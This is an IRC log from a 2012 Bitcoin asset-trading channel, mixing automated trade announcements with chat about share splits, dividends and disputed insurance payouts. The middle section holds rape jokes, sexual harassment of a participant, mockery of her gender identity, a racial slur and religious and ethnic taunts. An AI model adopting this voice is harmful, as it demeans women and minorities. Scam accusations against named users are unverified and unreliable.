Sep 16 19:23:50 [GLBSE] [GIGAMINING] 6 @ 0.601 = 3.606 BTC [-] Sep 16 19:23:52 [GLBSE] [GIGAMINING] 5 @ 0.6 = 3 BTC [-] Sep 16 19:26:01 [MPEX] [S.MPOE] 10400 @ 0.00040693 = 4.2321 BTC [-] Sep 16 19:27:56 [GLBSE] [BDK.BND] 2 @ 0.098 = 0.196 BTC [+] Sep 16 19:29:25 [GLBSE] [OBSI.HRPT] 100 @ 0.10125 = 10.125 BTC [+] Sep 16 19:31:36 Anyone selling DMC/GIGAMINING? Or anything. Sep 16 19:32:12 [GLBSE] [OBSI.HRPT] 30 @ 0.1014 = 3.042 BTC [+] Sep 16 19:33:01 I will sell you F.GIGA for >= 0.0006 Sep 16 19:34:05 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 16 19:37:21 F.GIGA will not upgrade to TERAMINING so... kind of a doomed stock Sep 16 19:40:34 F.GIGA? Sep 16 19:41:05 wait nvm Sep 16 19:42:10 yes the giga passthrouggh on mpex **** BEGIN LOGGING AT Mon Sep 17 02:23:04 2012 Sep 17 02:30:21 [GLBSE] [FPGAMINING] 2 @ 0.688 = 1.376 BTC [-] Sep 17 02:42:02 [MPEX] [F.GIGA.ETF] 4000 @ 0.00038556 = 1.5422 BTC [-] Sep 17 02:42:04 [MPEX] [F.GIGA.ETF] 8600 @ 0.00037812 = 3.2518 BTC [-] Sep 17 02:42:05 [MPEX] [S.MPOE] 34091 @ 0.00040695 = 13.8733 BTC [+] Sep 17 02:42:30 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [+] Sep 17 02:43:51 [GLBSE] [BITBOND] 1 @ 0.32 BTC [+] Sep 17 02:46:08 [GLBSE] [DMC] 10 @ 0.0599999 = 0.6 BTC [-] Sep 17 02:46:56 [GLBSE] [DMC] 49 @ 0.06 = 2.94 BTC [+] Sep 17 02:47:15 [GLBSE] [SS] 13 @ 0.025 = 0.325 BTC [+] Sep 17 02:47:42 [GLBSE] [DMC] 11 @ 0.065 = 0.715 BTC [+] Sep 17 02:47:44 [GLBSE] [NYAN] 1 @ 0.09201001 BTC [-] Sep 17 02:47:46 [GLBSE] [NYAN] 4 @ 0.09201 = 0.368 BTC [-] Sep 17 02:48:23 [GLBSE] [DMC] 52 @ 0.066 = 3.432 BTC [+] Sep 17 02:48:33 [GLBSE] [BIB.BVPS] 100 @ 0.00445 = 0.445 BTC [-] Sep 17 02:49:00 [GLBSE] [DMC] 57 @ 0.0666 = 3.7962 BTC [+] Sep 17 02:49:41 [GLBSE] [DMC] 94 @ 0.067 = 6.298 BTC [+] Sep 17 02:50:42 [GLBSE] [DMC] 28 @ 0.068 = 1.904 BTC [+] Sep 17 02:51:09 [GLBSE] [DMC] 47 @ 0.069 = 3.243 BTC [+] Sep 17 02:52:28 [GLBSE] [DMC] 20 @ 0.07 = 1.4 BTC [+] Sep 17 02:56:14 [GLBSE] [DMC] 100 @ 0.08 = 8 BTC [+] Sep 17 02:56:21 [GLBSE] [BFLS.RIG] 1 @ 0.988 BTC [+] Sep 17 02:56:43 [GLBSE] [DMC] 62 @ 0.085 = 5.27 BTC [+] Sep 17 02:57:01 [GLBSE] [DMC] 31 @ 0.088 = 2.728 BTC [+] Sep 17 02:57:23 [GLBSE] [DMC] 4 @ 0.088988 = 0.356 BTC [+] Sep 17 02:57:39 [GLBSE] [DMC] 75 @ 0.088989 = 6.6742 BTC [+] Sep 17 02:57:58 [GLBSE] [DMC] 100 @ 0.0898 = 8.98 BTC [+] Sep 17 02:58:51 [GLBSE] [DMC] 10 @ 0.095 = 0.95 BTC [+] Sep 17 02:59:15 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.92307692 BTC [-] Sep 17 02:59:43 [GLBSE] [ASICMINER] 15 @ 0.1138988 = 1.7085 BTC [+] Sep 17 02:59:54 [GLBSE] [MERGEDMINING] 3 @ 0.07997 = 0.2399 BTC [-] Sep 17 03:00:03 [GLBSE] [ASICMINER] 9 @ 0.1138989 = 1.0251 BTC [+] Sep 17 03:00:32 [GLBSE] [ASICMINER] 2 @ 0.1139 = 0.2278 BTC [+] Sep 17 03:01:07 [GLBSE] [ASICMINER] 10 @ 0.11488778 = 1.1489 BTC [+] Sep 17 03:02:19 [GLBSE] [ASICMINER] 3 @ 0.11488887 = 0.3447 BTC [+] Sep 17 03:02:20 [GLBSE] [SS] 5 @ 0.025 = 0.125 BTC [+] Sep 17 03:02:21 [GLBSE] [SS] 3 @ 0.0254999 = 0.0765 BTC [+] Sep 17 03:02:33 [GLBSE] [SS] 10 @ 0.026 = 0.26 BTC [+] Sep 17 03:02:37 [GLBSE] [ASICMINER] 6 @ 0.1149 = 0.6894 BTC [+] Sep 17 03:02:49 [GLBSE] [NYAN.C] 1 @ 0.3 BTC [-] Sep 17 03:03:22 [GLBSE] [BIB.BVPS] 10 @ 0.00445 = 0.0445 BTC [-] Sep 17 03:03:28 [GLBSE] [BFLS.RIG] 1 @ 0.98899 BTC [+] Sep 17 03:03:34 [GLBSE] [OBSI.HRPT] 4 @ 0.102 = 0.408 BTC [+] Sep 17 03:03:48 [GLBSE] [ASICMINER] 5 @ 0.11499999 = 0.575 BTC [+] Sep 17 03:06:15 DMC unlocked eh Sep 17 03:06:25 [GLBSE] [OBSI.HRPT] 6 @ 0.102 = 0.612 BTC [+] Sep 17 03:07:18 Azelphur: <@assbot> [GLBSE] [SS] 10 @ 0.026 = 0.26 BTC [+] << they're coming for you Sep 17 03:07:34 fun Sep 17 03:07:57 oh yay today is payout day Sep 17 03:08:02 [MPEX] [S.MPOE] 14800 @ 0.00040695 = 6.0229 BTC [+] Sep 17 03:08:21 wat Sep 17 03:08:49 dub: they split the shares up Sep 17 03:08:54 Doffx: 100 for 1 split Sep 17 03:08:58 ah Sep 17 03:09:28 aww, pay day isn't for another 4 hours GLBSE time Sep 17 03:09:31 stupid timezones :< Sep 17 03:09:54 what payday azel ? Sep 17 03:09:59 SS Sep 17 03:10:03 [GLBSE] [RSM] 10 @ 0.3 = 3 BTC [+] Sep 17 03:10:10 wait Sep 17 03:10:13 whos buying all the DMC Sep 17 03:10:21 nobody Sep 17 03:10:23 badum-tish Sep 17 03:10:26 lol Sep 17 03:10:45 :p Sep 17 03:10:54 wow Sep 17 03:11:11 apparently usagi has also taken on the duties of smack talk on the dmc thread Sep 17 03:11:30 why is it that when companies post their products on sites (amazon etc) they feel the need to take the photos on a potato? Sep 17 03:11:43 I mean seriously, who takes photos at 280x280 Sep 17 03:11:52 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 17 03:11:53 mr potato head does Sep 17 03:11:54 its not the size thats an issue Sep 17 03:11:56 its the quality Sep 17 03:11:57 xD Sep 17 03:12:01 [GLBSE] [MU] 2 @ 0.269 = 0.538 BTC [-] Sep 17 03:12:05 Diablo-D3: at 280x280, it's both. Sep 17 03:12:11 Azelphur: i don't usually make the dividend payment right at 00:01 Sep 17 03:12:21 smickles: hehe, I know Sep 17 03:12:30 anyhow, now thanks to usagi Sep 17 03:12:40 I can eat popcorn and not fear getting butter on the keys Sep 17 03:12:46 Diablo-D3: usagi seems to have been appointed chief pertinent information provider of bitcointalk and IRC Sep 17 03:12:58 dub: good, I dont have to anymore Sep 17 03:13:04 Ive held that position for like 2 years Sep 17 03:13:08 I hate _all_ of you Sep 17 03:13:11 even you. Sep 17 03:13:15 especially you. Sep 17 03:13:25 you don't love me anymore Sep 17 03:13:46 I only have love for boobs, dub Sep 17 03:14:00 What smickles? Sep 17 03:14:27 oh, sorry Doffx, bad autocomplete Sep 17 03:14:38 Haha, np. Sep 17 03:15:05 Diablo-D3: http://www.youtube.com/watch?v=kWD5gdpt4Dw Sep 17 03:15:35 [GLBSE] [OBSI.HRPT] 14 @ 0.1019 = 1.4266 BTC [-] Sep 17 03:15:37 [GLBSE] [OBSI.HRPT] 23 @ 0.102 = 2.346 BTC [+] Sep 17 03:15:38 [GLBSE] [OBSI.HRPT] 60 @ 0.1021 = 6.126 BTC [+] Sep 17 03:15:40 [GLBSE] [OBSI.HRPT] 40 @ 0.1022 = 4.088 BTC [+] Sep 17 03:15:41 [GLBSE] [OBSI.HRPT] 30 @ 0.1023 = 3.069 BTC [+] Sep 17 03:15:42 [GLBSE] [OBSI.HRPT] 3 @ 0.1024 = 0.3072 BTC [+] Sep 17 03:16:45 [GLBSE] [OBSI.HRPT] 7 @ 0.1024 = 0.7168 BTC [+] Sep 17 03:18:58 [GLBSE] [NASTY] 1 @ 0.45 BTC [-] Sep 17 03:18:59 [GLBSE] [NASTY] 1 @ 0.44 BTC [-] Sep 17 03:19:01 [GLBSE] [NASTY] 1 @ 0.4235 BTC [-] Sep 17 03:19:01 [GLBSE] [NASTY] 1 @ 0.422 BTC [-] Sep 17 03:19:02 [GLBSE] [NASTY] 2 @ 0.421 = 0.842 BTC [-] Sep 17 03:19:03 [GLBSE] [NASTY] 9 @ 0.4201 = 3.7809 BTC [-] Sep 17 03:19:05 [GLBSE] [NASTY] 5 @ 0.42 = 2.1 BTC [-] Sep 17 03:19:06 [GLBSE] [NASTY] 25 @ 0.41 = 10.25 BTC [-] Sep 17 03:19:14 [GLBSE] [OBSI.HRPT] 1 @ 0.1024 BTC [+] Sep 17 03:19:16 [GLBSE] [COGNITIVE] 1 @ 0.44100001 BTC [-] Sep 17 03:19:17 [GLBSE] [COGNITIVE] 1 @ 0.441 BTC [-] Sep 17 03:19:19 [GLBSE] [COGNITIVE] 1 @ 0.44 BTC [-] Sep 17 03:19:35 Azelphur: i don't usually make the dividend payment right at 00:01 <<< but when i do, i make sure there's a mistake in it :D Sep 17 03:19:50 :P Sep 17 03:20:06 dub o noes, usagi is the chan ho nao ? Sep 17 03:20:23 you mean, like everyone used to make fun of diablo, now we have to switch ?! but i dun wanna switch! Sep 17 03:22:16 I don't think we'll ever stop making fun if Diablo-D3 Sep 17 03:22:21 s/if/of Sep 17 03:22:49 yea, no ifs huh ? Sep 17 03:23:09 dub: you did read the new contract, right? Sep 17 03:24:06 no Sep 17 03:24:17 [20:13:09] I hate _all_ of you Sep 17 03:24:21 but I also didn't read the old one Sep 17 03:24:24 [20:13:46] I only have love for boobs, dub Sep 17 03:24:27 ... Sep 17 03:24:31 I'm so confused Sep 17 03:24:41 my boobs are clearly not up to spec Sep 17 03:24:51 wonder if mine are Sep 17 03:24:57 pics Sep 17 03:25:02 (or gtfo) Sep 17 03:25:09 heh Sep 17 03:25:16 GIYF Sep 17 03:25:41 =| Sep 17 03:27:30 dub -- http://www.urbandictionary.com/define.php?term=giyf ... and also, http://lmgtfy.com/?q=picture+of+kuzetsa Sep 17 03:30:10 did you blog an ascii representation of your tits in ##slackware back in 2009 or is there something I'm missing Sep 17 03:30:41 oh, derp it wrapped badly Sep 17 03:30:47 haha Sep 17 03:31:09 lol kuzetsa is claiming to be female Sep 17 03:31:22 oh wait, shes a lesbian Sep 17 03:31:25 thats totally okay then Sep 17 03:31:35 oh god it hurts Sep 17 03:31:38 yes the only real females are lesbian Sep 17 03:31:41 don't make me laugh Sep 17 03:31:43 on the internet Sep 17 03:31:50 dub: yup pretty much Sep 17 03:32:00 [GLBSE] [GSDPT] 40 @ 0.0034 = 0.136 BTC [+] Sep 17 03:32:03 im gonna step up and call trap Sep 17 03:32:14 based on the one photo on okcupid Sep 17 03:32:23 but im also at work so not digging deep Sep 17 03:32:41 yes the only real females are lesbian << irl too. Sep 17 03:32:48 eh Sep 17 03:32:49 what's the point of having a gf if she won't fuck your other gfs ? Sep 17 03:33:07 mircea_popescu: of course all females are in some part raging dykes Sep 17 03:33:09 I go out of my way lately NOT to have any new photos circulating Sep 17 03:33:26 also, lol @ "trap" Sep 17 03:33:30 kinda the reverse Sep 17 03:33:36 kuzetsa: what do you drive? Sep 17 03:33:45 I don't believe in gender / barely self-identify as anything close to female Sep 17 03:33:53 currently I don't have a car Sep 17 03:34:28 had a honda civic from aprox 2003? 'til 2005 until a bus squished me and my coworkers while carpooling Sep 17 03:34:49 so wehn you say you like tuning is that more for like, grand tourismo or forza or whatever the kids play these days Sep 17 03:34:59 why is it that people who "don't believe in gender" are always poor ? Sep 17 03:35:00 got a new car the next year but then about 8 months ago some idiot college kid hit me and totaled my car Sep 17 03:35:02 [MPEX] [S.MPOE] 4700 @ 0.00040696 = 1.9127 BTC [+] Sep 17 03:35:07 [08:32:49] what's the point of having a gf if she won't fuck your other gfs ? Sep 17 03:35:11 mircea_popescu: poor? Sep 17 03:35:14 I want to subscribe to your newsletter Sep 17 03:35:22 Diablo-D3 lolz Sep 17 03:35:30 Diablo-D3: is that a real quote? Sep 17 03:35:38 heh. yay for non-exclusivity :) Sep 17 03:35:45 monogamy is such rubbish Sep 17 03:35:45 or is it some kind of gay double entendre Sep 17 03:35:56 its a triple entente Sep 17 03:36:00 ? Sep 17 03:36:14 o...k Sep 17 03:36:34 kuzetsa don't take it too heart. we're mostly meanies here Sep 17 03:36:39 cause everyone's trying to copy me. Sep 17 03:36:49 excelent Sep 17 03:36:51 copy you? nigga please. Sep 17 03:37:22 Diablo-D3 http://trilema.com/2010/nsfw-mosu-cu-joarda/ << newsletter 1st installment. you missed out i think. Sep 17 03:38:20 hmm Sep 17 03:38:23 dub http://polimedia.us/dtng/c/src/134766042890.jpg << high six without one participant (btw, nsfw as all hell) Sep 17 03:38:31 so uhm... I know someone who speaks romani Sep 17 03:38:42 as in romanian ? Sep 17 03:38:47 ? Sep 17 03:38:51 uhm... she's a gypsy Sep 17 03:38:57 thats disgusting Sep 17 03:39:05 ah. Sep 17 03:39:06 http://en.wikipedia.org/wiki/Romani_language -- it's not called romanian Sep 17 03:39:09 seriously, ubuntu will go to anything to promote their distro Sep 17 03:39:22 oooh Sep 17 03:39:27 wait, I just confused the two lol Sep 17 03:39:33 kuzetsa there's a ue official language called romanian and a spoken only pigdin thing called romani Sep 17 03:39:38 that was a romanian page you linked me lolol Sep 17 03:41:06 damn now I want curry Sep 17 03:41:07 luke-jr_: what is your opinion on this http://25.media.tumblr.com/tumblr_macdf9WJiP1qcbo9lo1_500.jpg Sep 17 03:41:10 lol Sep 17 03:41:30 damn you mircea_popescu: I got confused and thought about curry Sep 17 03:41:38 it's your fault Sep 17 03:41:48 I'd like a lamb vindaloo Sep 17 03:41:54 i'd like lamb tikka masala Sep 17 03:41:54 oh god, really? Sep 17 03:42:04 with some of that spicy pickle shit Sep 17 03:42:06 dub do you suppose kuzetsa would approximate lamb ? Sep 17 03:42:08 dub: really. just. no. Sep 17 03:42:14 kuzetsa: and not that kind of spicy pickle thanks Sep 17 03:42:21 lol Sep 17 03:42:25 don't pick on luke's religion please. it offends me on principle. Sep 17 03:42:37 but his religion sucks Sep 17 03:42:42 LOL CATHOLICS Sep 17 03:42:51 LETS RAPE THEM ALL... no wait, they'd enjoy that Sep 17 03:43:10 i like -assets, its a very business-like place. Sep 17 03:43:13 rape is gods way of letting us know how important sperm is Sep 17 03:43:19 exactly Sep 17 03:43:25 women should never refuse my gift to them Sep 17 03:43:32 it is plentiful and gooey. Sep 17 03:43:46 yeah so uhm... blah blah blah ... various forms of antisocial behavior, including (but not limited to) political, racial, ethnic, religious or gender-related invective. Sep 17 03:43:55 srsly. freenode policy. Sep 17 03:44:04 kuzetsa: I _think_ we've covered every base there Sep 17 03:44:04 plz stop kthx Sep 17 03:44:14 wait, did we bring up race yet? Sep 17 03:44:16 or else I shall protest a second time. Sep 17 03:44:28 someone said nigger a little while ago Sep 17 03:44:30 [20:36:51] copy you? nigga please. Sep 17 03:44:31 kuzetsa: threats of drama dont work on us Sep 17 03:44:34 dub i agree about homo dinosaurs Sep 17 03:44:40 oh right, I did race, sorry, forgot Sep 17 03:44:57 jcpham: stands to reason. Sep 17 03:45:45 mircea_popescu: an unrelated fact, something like 40-50% of sheep are homosexual Sep 17 03:46:00 explain that, catholics Sep 17 03:46:01 you mean rams ? Sep 17 03:46:13 you can't dogde a ram Sep 17 03:46:14 yes, sorry rams Sep 17 03:46:19 i would guess about 5-10% of all live sheep are rams Sep 17 03:46:45 and most small herbivores (rams, goats, etc) have this group sex thingy where they pick a victim and mass rape it. Sep 17 03:46:46 idk, wouldn't it by closer to 1-1 Sep 17 03:46:48 uhm Sep 17 03:46:50 drama Sep 17 03:47:17 and it's not 1 : 1 cause sheep are comercially grown for the most part. Sep 17 03:47:19 oww my brain Sep 17 03:47:21 kuzetsa: this is hardly drama, nobody has stolen all the bitcoins or commited e-suicide yet Sep 17 03:47:31 tho we were rooting for wright . Sep 17 03:47:40 dub: wait Sep 17 03:47:42 didnt atlas try Sep 17 03:47:44 [GLBSE] [OBSI.HRPT] 1 @ 0.1024 BTC [+] Sep 17 03:47:45 mircea_popescu: no, I meant this -- [20:44:32] kuzetsa: threats of drama dont work on us Sep 17 03:48:05 I'm mostly too confused to have much to say Sep 17 03:48:34 mircea_popescu: I thought they were farmed for volume in general not dominated by a particular sex (like cows for eg) Sep 17 03:48:43 tbh I have no fucking idea Sep 17 03:48:59 do we milk sheep? I guess some peopl edo Sep 17 03:49:15 sheep wool is better grade than ram, also they're cheaper to grow and easier to handle. Sep 17 03:49:29 there you go! Sep 17 03:49:35 we milk goats Sep 17 03:49:35 in general lamb meat comes from male sheepsies. Sep 17 03:49:39 but sheep? eh Sep 17 03:49:46 Ive never seen sheep cheese for sale Sep 17 03:49:48 dub: "like cows for eg" is awfully redundant Sep 17 03:49:56 Diablo-D3 you live in the shithole of bad cheese, the us. Sep 17 03:50:05 sheep cheese is well known and well eaten Sep 17 03:50:12 huh, I did not know this Sep 17 03:50:19 http://en.wikipedia.org/wiki/List_of_Latin_phrases_(E)#exempli_gratia --- "for for example" or "for for instance" is basically what you said. Sep 17 03:50:21 i seriously don't know a place with worse cheeses Sep 17 03:50:21 and hey, we have ceddar Sep 17 03:50:32 yea, made out of what exactly ? wood pulp i think Sep 17 03:51:07 kuzetsa: yes, mostly illiterate sorry Sep 17 03:51:15 yeah :/ Sep 17 03:51:19 i'm sorry too Sep 17 03:51:29 I blame the US school system Sep 17 03:51:34 and the UK one Sep 17 03:51:35 mircea_popescu: no, dead republicans Sep 17 03:51:43 I'm kinda slow at times (oftener than I like) and feel less bad picking on someone when they do gramatically confusing things Sep 17 03:51:58 also, dyslexia means bad grammar hurts my head a bit more than I like. Sep 17 03:52:47 kakobrekla are you the chick of naked therapy ? Sep 17 03:52:56 eep Sep 17 03:53:01 [GLBSE] [GSDPT] 30 @ 0.0034 = 0.102 BTC [+] Sep 17 03:53:02 ha? Sep 17 03:53:05 jesus, even kak is a chick? Sep 17 03:53:10 naw. Sep 17 03:53:11 that... no Sep 17 03:53:12 THERE ARE NO WOMEN ON THE INTERNET Sep 17 03:53:16 NONE Sep 17 03:53:23 I HAVE DONE YEARS OF RESEARCH Sep 17 03:53:29 Diablo-D3 there's like... 3 in my private chan Sep 17 03:53:31 there are a lot of fbi agents in this channel Sep 17 03:53:37 dub: yeah, tons Sep 17 03:53:47 cant even get to the bathroom without tripping over a few Sep 17 03:53:59 and forget the fridge Sep 17 03:54:08 as they say, theres too many sparkling wiggles at the party Sep 17 03:54:25 [GLBSE] [BIB.BVPS] 2 @ 0.00445 = 0.0089 BTC [-] Sep 17 04:00:31 [GLBSE] [YABMC] 2 @ 0.0995 = 0.199 BTC [+] Sep 17 04:01:11 [MPEX] [S.MPOE] 37000 @ 0.00040696 = 15.0575 BTC [+] Sep 17 04:01:43 [GLBSE] [OBSI.HRPT] 1 @ 0.1024 BTC [+] Sep 17 04:04:03 [GLBSE] [YABMC] 7 @ 0.0999 = 0.6993 BTC [+] Sep 17 04:08:06 !ticker dmc Sep 17 04:08:08 [GLBSE:DMC] [Bid: 0.03] [Ask: 0.09] [Spread: 0.06] [Last: 0.095] [24hVol: 63.77234175] [7dAvg: 0.05799314] Sep 17 04:10:56 [GLBSE] [OBSI.HRPT] 1 @ 0.1024 BTC [+] Sep 17 04:28:02 [MPEX] [S.MPOE] 29337 @ 0.00040698 = 11.9396 BTC [+] Sep 17 04:32:50 [GLBSE] [MU] 1 @ 0.269 BTC [-] Sep 17 04:33:00 [GLBSE] [MU] 1 @ 0.269 BTC [-] Sep 17 04:33:13 [GLBSE] [MU] 1 @ 0.269 BTC [-] Sep 17 04:34:09 [GLBSE] [BMMO] 4 @ 0.075849 = 0.3034 BTC [-] Sep 17 04:44:42 [GLBSE] [FUTUREFUND] 4 @ 0.00012936 = 0.0005 BTC [+] Sep 17 04:51:47 ;;seen deadterra Sep 17 04:51:47 deadterra was last seen in #bitcoin-assets 2 days, 7 hours, 37 minutes, and 11 seconds ago: London Bitcoin Conference Sep 17 04:52:34 heya dust-otc Sep 17 04:52:45 hey Sep 17 04:53:18 GIPPT still has not paid its insurance Sep 17 04:53:34 I think it is time for a scam accusation on ineededausername and imsaguy Sep 17 04:53:45 did you get GIPPOED Sep 17 04:54:02 [MPEX] [F.GIGA.ETF] 2342 @ 0.00037812 = 0.8856 BTC [-] Sep 17 04:54:13 dub: yeah my only pirate exposure, I bought some at ipo to resell Sep 17 04:54:25 stuck with 29 shares and it is almost half paid out, so not too big of a loss Sep 17 04:54:29 bummer Sep 17 04:54:35 <[\\\]> dust-otc, you realize the majority of what's been paid out has come from me? Sep 17 04:54:47 DT probably deserves scammer tag Sep 17 04:54:57 dub: has DT paid his 5%? Sep 17 04:55:12 serial getting scammed and continuing to try to put a finger in every pie Sep 17 04:55:17 [\\\]: how much of your obligation have you paid? Sep 17 04:55:19 no idea Sep 17 04:55:25 i know that hashking is the one failing the most Sep 17 04:55:46 dub: assuming DT pays his 5%, he isn't a scammer Sep 17 04:55:59 but he oversees some of the shadiest assets Sep 17 04:56:08 <[\\\]> dust-otc, i've reconciled something like 75% of mine Sep 17 04:56:13 most have them have failed or were scams Sep 17 04:56:18 hm Sep 17 04:56:41 yeah I was going to make a thread so blame could be placed on either imsaguy or INAU, or both Sep 17 04:56:55 <[\\\]> dust-otc: i've never hidden the fact that I'm a mining farm Sep 17 04:57:12 [\\\]: you had more with pirate than mining hardware Sep 17 04:57:26 <[\\\]> ... no Sep 17 04:57:44 why exactly is deadterra a scammer ? Sep 17 04:57:53 <[\\\]> When I bought much of that mining hardware, coins were valued at 1/4 of what they are today Sep 17 04:58:03 <[\\\]> in addition, the gpus are worth 1/4 of the USD that I bought them for Sep 17 04:58:05 mircea_popescu: im just being uncharitable Sep 17 04:58:18 dub im trying to keep track cause he handles s.dice pt. Sep 17 04:58:20 <[\\\]> Its not like I can go and sell a 7970 for $500 anymore Sep 17 04:58:21 he isn't Sep 17 04:58:31 most of his ipos have been scams though Sep 17 04:58:44 well, they were on glbse. Sep 17 04:58:54 mircea_popescu: and I have no time for what I percieve as "i must get rich quickly no matter how much of other peoples money I lose because I jump inter every get rich quick scheme" mentality Sep 17 04:58:58 [\\\]: but EIEIO's holdings at time of pirate default were more weighted towards pirate Sep 17 04:59:17 and earlier in your thread you had claimed on 100btc of exposure IIRC Sep 17 04:59:26 https://bitcointalk.org/index.php?topic=74216.msg1197034#msg1197034 Sep 17 04:59:33 SS financial report Sep 17 04:59:56 <[\\\]> dust-otc: no. Sep 17 05:00:31 dub i think what happens is a good chunk of people play a finance-flavoured mmorpg. they have the otaku forum + bitcoin, it's like warcraft + wc forums Sep 17 05:01:24 April 21: My exposure to PPT is currently 100 BTC and will always be a measured risk shared with the other 5 parties. Sep 17 05:01:25 After default: I had roughly 1500 btc in btcst that I had slowly grown via purchasing btc, tips from escrowing for people, market making and the like. I had personally set it aside to purchase asic hardware... Sep 17 05:01:25 ...I can wind EIEIO down now and sell the gear. I estimate the value of the gear to be about $13,000 which would yield about 1200 btc at today’s prices Sep 17 05:01:59 [\\\]: so what part of what I said was false? Sep 17 05:02:07 finance-flavoured mmorpg"", that's what bitcoin is, isn't it? ;) Sep 17 05:02:12 <[\\\]> how much in asicminer? Sep 17 05:02:22 <[\\\]> oh right Sep 17 05:02:25 <[\\\]> over 10k shares Sep 17 05:02:35 <[\\\]> at ipo price, that's how much? Sep 17 05:02:41 mircea_popescu: yeah, its a game to a lot of people Sep 17 05:02:52 <[\\\]> so the part of your statement that is false is [2012/09/16 20:58:59] [\\\]: but EIEIO's holdings at time of pirate default were more weighted towards pirate Sep 17 05:02:55 <[\\\]> that's false. Sep 17 05:02:57 smickles no! Sep 17 05:03:09 mircea_popescu: aw, c'mon, i was joking Sep 17 05:03:15 didn't you see the ;) Sep 17 05:03:17 no! *rage* Sep 17 05:03:28 ok, I was wrong then, you should have put that in your statement, which only stated that your BS&T holdings were > than your mining hardware holdings Sep 17 05:03:47 <[\\\]> dust-otc: it makes more long term sense to continue mining Sep 17 05:03:55 and if you have 10k shares of ASICMINER, why do you not sell some immediately and pay back GIPPT Sep 17 05:03:56 [\\\] you think ? Sep 17 05:03:59 mircea_popescu: so i'm going to start an accounting firm whin i move to arizona and register with the state. I don't think it's a game Sep 17 05:04:06 <[\\\]> dust-otc: now you're being stupid Sep 17 05:04:11 <[\\\]> there's no depth in GLBSE Sep 17 05:04:13 smickles just trolling you a little. Sep 17 05:04:19 <[\\\]> I could take it to near 0 Sep 17 05:04:24 :o Sep 17 05:04:39 <[\\\]> dust-otc, my obligation is with JD Sep 17 05:04:44 <[\\\]> thats who I signed the contract with Sep 17 05:04:46 [\\\] btc-mining was looking to buy stuff, in case you're actively trying to divest. Sep 17 05:04:53 <[\\\]> I'm not divesting Sep 17 05:05:04 <[\\\]> its these people with tiny shares making the largest amount of noise Sep 17 05:05:09 <[\\\]> funny how that works Sep 17 05:05:12 hey, a share a vote. Sep 17 05:05:22 you should have a 20 btc minimum. Sep 17 05:05:26 <[\\\]> mircea_popescu: that already happened Sep 17 05:05:31 :p Sep 17 05:05:34 I would have been a big shareholder in GIPPT but then I realized the insurance couldn't possibly be legit Sep 17 05:05:43 <[\\\]> take it up with GIPPT Sep 17 05:05:47 <[\\\]> my obligation isn't to you Sep 17 05:05:54 in truth collateralization/insurance/etc is prolly the biggest financial problem of btc atm. Sep 17 05:06:29 buncha people tried to do it on the grounds of "i've read the wikipedia article so i know all about it", and failed ridiculously Sep 17 05:06:36 but the thing will have to be resolved somehow. Sep 17 05:06:36 trusting random 15 year old children and boy/girl/anime character anon weirdos Sep 17 05:06:47 to provide insurance that is Sep 17 05:06:59 is the 15 yo reference to hashking ? Sep 17 05:07:09 yeah Sep 17 05:07:16 he isn't 15 Sep 17 05:07:16 that will go down in history as the stupidest thing someonesaid Sep 17 05:07:24 srsly, he was trying to be funny. he's not 15. Sep 17 05:07:28 <[\\\]> HK isn't 15 Sep 17 05:07:34 <[\\\]> I know that for certain. Sep 17 05:07:34 oh, he has a terrible sense of humour then Sep 17 05:07:44 <[\\\]> Anyone clinging to it is terribly misguided. Sep 17 05:07:45 and is a scammer anyway Sep 17 05:08:00 dub he just tryied sarcasm in the worst possible way in the worst possible spot. Sep 17 05:08:03 but he's not actually 15. Sep 17 05:08:09 ok Sep 17 05:08:35 he;'s also pretty stupid, but i don't think too dishonest. Sep 17 05:08:37 who knows. Sep 17 05:09:11 he seems to have said that he had non-pirate funds to cover his pirate exposure and lied Sep 17 05:09:38 and combined with a good level of trust in the 'community' == scammer Sep 17 05:10:17 none of the "insured" pirate funds made sense Sep 17 05:10:20 i can see the argument. Sep 17 05:10:45 the worst thing he did, imo, was the bs announcement. Sep 17 05:10:45 none of the pirate funds made sense Sep 17 05:10:46 as anyone who really had the coins to 100% insure deposits should have just invested those coins with pirate himself Sep 17 05:10:53 dust-otc: agreed, I'm only aware of two others, one is an entirely imaginary person! Sep 17 05:10:55 [GLBSE] [FZB.A] 16 @ 0.0321 = 0.5136 BTC [+] Sep 17 05:10:56 [GLBSE] [FZB.A] 162 @ 0.032 = 5.184 BTC [-] Sep 17 05:10:56 if you are insolvent you go "i owe this much, i have this much" Sep 17 05:11:00 not vague bs like he did. Sep 17 05:11:21 Not if you want to just take the coins Sep 17 05:11:29 that haven't been paid out Sep 17 05:11:40 i can see that argument too. Sep 17 05:11:53 So if he was investing in zeek, why did that address still have 500k coins Sep 17 05:12:04 either it wasn't him Sep 17 05:12:13 or...? Sep 17 05:12:36 it's very possible it wasn't him, for instance one way to sell bitcoins is to sell wallets. Sep 17 05:13:18 Hey what ever happened to ZIP.A? I haven't signed into GLBSE in a while and that's all the assets I have left Sep 17 05:13:28 bonks turned scam. Sep 17 05:14:18 but the guy partenered with the tradehill ex owner/scammer to "further bitcoin" by building some conference hall or w/e in ny. Sep 17 05:14:38 out of money they mysteriously have from who knows where. Sep 17 05:14:58 [MPEX] [F.GIGA.ETF] 7258 @ 0.00037214 = 2.701 BTC [-] Sep 17 05:14:59 [MPEX] [F.GIGA.ETF] 2549 @ 0.00039225 = 0.9998 BTC [+] Sep 17 05:16:05 I'm tired of all these scams Sep 17 05:16:18 I don't know if FZB is a scam but I just sold all of mine a few mins ago Sep 17 05:16:21 It is remarkable to me Sep 17 05:16:30 the nearly complete infestation Sep 17 05:16:42 of scams in this 'community' Sep 17 05:18:03 [\\\]: i might be willing to buy some ASICMINER at the current bid price so you can pay back GIPPT Sep 17 05:18:07 how much do you owe? Sep 17 05:21:36 :mircea_popescu Do the MPCD's trade on the market, just no current bid/asks? Sep 17 05:21:48 :mircea_popescu Any way to get a full account history? Sep 17 05:22:07 Not just STAT short term data Sep 17 05:22:25 <[\\\]> dust-otc, how much of a position do you hvae in GIPPT? Sep 17 05:24:04 29 shares lol Sep 17 05:26:41 <[\\\]> wouldn't it make more sense for me to buy your shares? ;) Sep 17 05:27:26 that wouldn't be fair to the other investors Sep 17 05:27:32 and I won't take less than what is owed Sep 17 05:27:50 <[\\\]> ah right, you'd rather just complain Sep 17 05:28:18 pretty much Sep 17 05:28:31 I would rather not have the bitcoin community filled with scams Sep 